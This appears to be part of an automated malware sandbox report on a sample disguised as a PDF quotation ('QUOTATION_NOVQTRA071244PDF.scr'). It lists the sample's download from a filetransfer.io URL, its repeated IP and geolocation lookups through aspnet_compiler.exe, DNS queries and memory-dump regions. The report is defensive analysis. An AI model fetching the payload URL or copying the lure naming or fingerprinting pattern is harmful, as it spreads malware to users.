  • 104.21.13.139:443
    https://s23.filetransfer.io/storage/download/FkXcFOVglHQY
    tls, http
    QUOTATION_NOVQTRA071244PDF.scr
    31.8kB
    1.1MB
    604
    815

    HTTP Request

    GET https://s23.filetransfer.io/storage/download/FkXcFOVglHQY

    HTTP Response

    200
  • 193.122.6.168:80
    http://checkip.dyndns.org/
    http
    aspnet_compiler.exe
    2.2kB
    4.1kB
    23
    14

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200
  • 104.21.67.152:443
    https://reallyfreegeoip.org/xml/138.199.29.44
    tls, http
    aspnet_compiler.exe
    2.4kB
    17.6kB
    30
    31

    HTTP Request

    GET https://reallyfreegeoip.org/xml/138.199.29.44

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/138.199.29.44

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/138.199.29.44

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/138.199.29.44

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/138.199.29.44

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/138.199.29.44

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/138.199.29.44

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/138.199.29.44

    HTTP Response

    200
  • 8.8.8.8:53
    filetransfer.io
    dns
    QUOTATION_NOVQTRA071244PDF.scr
    61 B
    93 B
    1
    1

    DNS Request

    filetransfer.io

    DNS Response

    104.21.13.139
    172.67.200.96

  • 8.8.8.8:53
    s23.filetransfer.io
    dns
    QUOTATION_NOVQTRA071244PDF.scr
    65 B
    97 B
    1
    1

    DNS Request

    s23.filetransfer.io

    DNS Response

    104.21.13.139
    172.67.200.96

  • 8.8.8.8:53
    checkip.dyndns.org
    dns
    aspnet_compiler.exe
    64 B
    176 B
    1
    1

    DNS Request

    checkip.dyndns.org

    DNS Response

    193.122.6.168
    158.101.44.242
    193.122.130.0
    132.226.8.169
    132.226.247.73

  • 8.8.8.8:53
    reallyfreegeoip.org
    dns
    aspnet_compiler.exe
    65 B
    97 B
    1
    1

    DNS Request

    reallyfreegeoip.org

    DNS Response

    104.21.67.152
    172.67.177.134

MITRE ATT&CK Enterprise v15

Downloads

  • memory/2636-0-0x000007FEF5FA3000-0x000007FEF5FA4000-memory.dmp

    Filesize

    4KB

  • memory/2636-1-0x0000000000290000-0x00000000002C0000-memory.dmp

    Filesize

    192KB

  • memory/2636-2-0x000007FEF5FA0000-0x000007FEF698C000-memory.dmp

    Filesize

    9.9MB

  • memory/2636-3-0x000000001C760000-0x000000001C868000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-4-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-5-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-7-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-19-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-21-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-33-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-36-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-49-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-67-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-9-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-11-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-13-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-15-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-17-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-65-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-1079-0x0000000002470000-0x00000000024BC000-memory.dmp

    Filesize

    304KB

  • memory/2636-1078-0x000000001BCF0000-0x000000001BD6A000-memory.dmp

    Filesize

    488KB

  • memory/2636-63-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-61-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-1080-0x000007FEF5FA0000-0x000007FEF698C000-memory.dmp

    Filesize

    9.9MB

  • memory/2636-1081-0x000007FEF5FA0000-0x000007FEF698C000-memory.dmp

    Filesize

    9.9MB

  • memory/2636-59-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-57-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-55-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-53-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-51-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-47-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-45-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-43-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-41-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-39-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-37-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-31-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-29-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-27-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-25-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-23-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

  • memory/2636-1082-0x000007FEF5FA3000-0x000007FEF5FA4000-memory.dmp

    Filesize

    4KB

  • memory/2636-1083-0x000007FEF5FA0000-0x000007FEF698C000-memory.dmp

    Filesize

    9.9MB

  • memory/2636-1084-0x000000001BC00000-0x000000001BC54000-memory.dmp

    Filesize

    336KB

  • memory/2636-1087-0x000007FEF5FA0000-0x000007FEF698C000-memory.dmp

    Filesize

    9.9MB

  • memory/4856-1086-0x0000000000470000-0x0000000000498000-memory.dmp

    Filesize

    160KB

  • memory/4856-1088-0x000007FEF5FA3000-0x000007FEF5FA4000-memory.dmp

    Filesize

    4KB

  • memory/4856-1089-0x000007FEF5FA0000-0x000007FEF698C000-memory.dmp

    Filesize

    9.9MB

  • memory/4856-1090-0x0000000000AC0000-0x0000000000AE4000-memory.dmp

    Filesize

    144KB

  • memory/4856-1091-0x000007FEF5FA0000-0x000007FEF698C000-memory.dmp

    Filesize

    9.9MB

  • memory/4856-1092-0x000007FEF5FA0000-0x000007FEF698C000-memory.dmp

    Filesize

    9.9MB

  • memory/4856-1093-0x000007FEF5FA0000-0x000007FEF698C000-memory.dmp

    Filesize

    9.9MB

  • memory/4856-1094-0x000007FEF5FA0000-0x000007FEF698C000-memory.dmp

    Filesize

    9.9MB
